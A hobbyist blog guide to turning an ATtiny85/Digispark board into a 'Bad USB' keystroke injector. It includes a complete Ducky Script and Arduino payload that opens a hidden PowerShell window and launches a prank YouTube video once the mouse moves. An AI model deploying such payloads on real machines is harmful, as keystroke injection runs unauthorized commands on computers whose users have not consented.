Attiny85 to Bad USB

Published by jamesrivers.tech on

Unleashing the Power of a Tiny USB Rubber Ducky

Parts / Software

Installing Arduino IDE (skip if already installed)

1: Go to https://www.arduino.cc/en/software and find the right package for your OS. Use the setup wizard, and just keep hitting continue until it says Installation complete. (link for additional info)

Installing the Libray and the Board Manager

1: In the Arduino application go to the top left, click File then select Preferences

2: At the bottom of the box there is a blank bar with the title “Additional Boards Manager URLs“. 

http://digistump.com/package_digistump_index.json

Copy this link into the box, hit enter then exit the boards manager.

3: Next go to the top left again and use the Tools menu, then Board, and lastly Boards Manager. Type Digistump AVR Boards into the search bar, and install.

4: Once it says ”Installed” next to it, go back to Tools then, Boards, and select “Digispark (Default – 16.5mhz)

Converting Ducky Script to Arduino

1: The Digstump Library can be very confusing so writing a script in Ducky and then converting it into Arduino is 10x easier.

2: To do this we need to use one of SpaceHunn’s tools, https://duckify.huhn.me/ which will output the Arduino code needed.

3: Once the Arduino code is outputted successfully copy and paste it into your Arduino IDE and hit upload. (DO NOT PLUG IN Attiney85 YET!)

4: Once it is compiled (this might take a minute-ish) and uploaded look at the console and plug in the Attiney when prompted.

NOTE: This tool only works for ducky script protects that do not use additional ps1 files or other executables as there is no way to save them to the attiney85 ( at least that I know of ).

Ducky Script and Arduino Examples

This code makes the USB type a PowerShell command that senses when the mouse moves and plays a YouTube video in a new tab.

Ducky Script

GUI R
DELAY 500
STRING powershell -w h Add-Type -AssemblyName *m.W*s.F*s;$w=[Windows.Forms.Cursor];$p=$w::Position.X;while(1){if($w::Position.X-ne$p){break}else{Sleep 3}};saps https://youtu.be/WIRK_pGdIdA;sleep 3;$o=New-Object -ComObject WScript.Shell;$o.SendKeys('f')
DELAY 500
ENTER

Arduino 

// Platform: Digispark
// Keyboard Layout: US

#include "DigiKeyboard.h"

// powershell -w h Add-Type -AssemblyName *m.W*s.F*s;$w=[Windows.Forms.Cursor];$p=$w::Position.X;while(1){if($w::Position.X-ne$p){break}else{Sleep 3}};saps https://youtu.be/WIRK_pGdIdA;sleep 3;$o=New-Object -ComObject WScript.Shell;$o.SendKeys('f')
const uint8_t key_arr_0[] PROGMEM = {0,19, 0,18, 0,26, 0,8, 0,21, 0,22, 0,11, 0,8, 0,15, 0,15, 0,44, 0,45, 0,26, 0,44, 0,11, 0,44, 2,4, 0,7, 0,7, 0,45, 2,23, 0,28, 0,19, 0,8, 0,44, 0,45, 2,4, 0,22, 0,22, 0,8, 0,16, 0,5, 0,15, 0,28, 2,17, 0,4, 0,16, 0,8, 0,44, 2,37, 0,16, 0,55, 2,26, 2,37, 0,22, 0,55, 2,9, 2,37, 0,22, 0,51, 2,33, 0,26, 0,46, 0,47, 2,26, 0,12, 0,17, 0,7, 0,18, 0,26, 0,22, 0,55, 2,9, 0,18, 0,21, 0,16, 0,22, 0,55, 2,6, 0,24, 0,21, 0,22, 0,18, 0,21, 0,48, 0,51, 2,33, 0,19, 0,46, 2,33, 0,26, 2,51, 2,51, 2,19, 0,18, 0,22, 0,12, 0,23, 0,12, 0,18, 0,17, 0,55, 2,27, 0,51, 0,26, 0,11, 0,12, 0,15, 0,8, 2,38, 0,30, 2,39, 2,47, 0,12, 0,9, 2,38, 2,33, 0,26, 2,51, 2,51, 2,19, 0,18, 0,22, 0,12, 0,23, 0,12, 0,18, 0,17, 0,55, 2,27, 0,45, 0,17, 0,8, 2,33, 0,19, 2,39, 2,47, 0,5, 0,21, 0,8, 0,4, 0,14, 2,48, 0,8, 0,15, 0,22, 0,8, 2,47, 2,22, 0,15, 0,8, 0,8, 0,19, 0,44, 0,32, 2,48, 2,48, 0,51, 0,22, 0,4, 0,19, 0,22, 0,44, 0,11, 0,23, 0,23, 0,19, 0,22, 2,51, 0,56, 0,56, 0,28, 0,18, 0,24, 0,23, 0,24, 0,55, 0,5, 0,8, 0,56, 2,26, 2,12, 2,21, 2,14, 2,45, 0,19, 2,10, 0,7, 2,12, 0,7, 2,4, 0,51, 0,22, 0,15, 0,8, 0,8, 0,19, 0,44, 0,32, 0,51, 2,33, 0,18, 0,46, 2,17, 0,8, 0,26, 0,45, 2,18, 0,5, 0,13, 0,8, 0,6, 0,23, 0,44, 0,45, 2,6, 0,18, 0,16, 2,18, 0,5, 0,13, 0,8, 0,6, 0,23, 0,44, 2,26, 2,22, 0,6, 0,21, 0,12, 0,19, 0,23, 0,55, 2,22, 0,11, 0,8, 0,15, 0,15, 0,51, 2,33, 0,18, 0,55, 2,22, 0,8, 0,17, 0,7, 2,14, 0,8, 0,28, 0,22, 2,38, 0,52, 0,9, 0,52, 2,39};

void duckyString(const uint8_t* keys, size_t len) {  
    for(size_t i=0; i<len; i+=2) {
        DigiKeyboard.sendKeyStroke(pgm_read_byte_near(keys + i+1), pgm_read_byte_near(keys + i));
    }
}

void setup() {
    pinMode(1, OUTPUT); // Enable LED
    digitalWrite(1, LOW); // Turn LED off
    DigiKeyboard.sendKeyStroke(0); // Tell computer no key is pressed

    DigiKeyboard.sendKeyStroke(21, 8); // GUI R
    DigiKeyboard.delay(500); // DELAY 500
    duckyString(key_arr_0, sizeof(key_arr_0)); // STRING powershell -w h Add-Type -AssemblyName ...
    DigiKeyboard.delay(500); // DELAY 500
    DigiKeyboard.sendKeyStroke(40, 0); // ENTER
}

void loop() {}

// Created using duckify.huhn.me

Sources

Categories: Guide

0 Comments

Leave a Reply

Avatar placeholder

Your email address will not be published. Required fields are marked *

Related Posts

Guide

nmap notes

Nmap cheat-sheet covering host discovery, common scan types, timing, and evasion techniques. Also lists service/OS detection, NSE scripting, verbosity/debugging, and output formats.

Guide

iPhonography 101

Techniques for Taking Professional-Level Shots on iPhone The Rule of Thirds is a compositional guideline. Shots are divided into nine equal parts by two horizontal and two vertical lines. Points where lines intersect are Focal Read more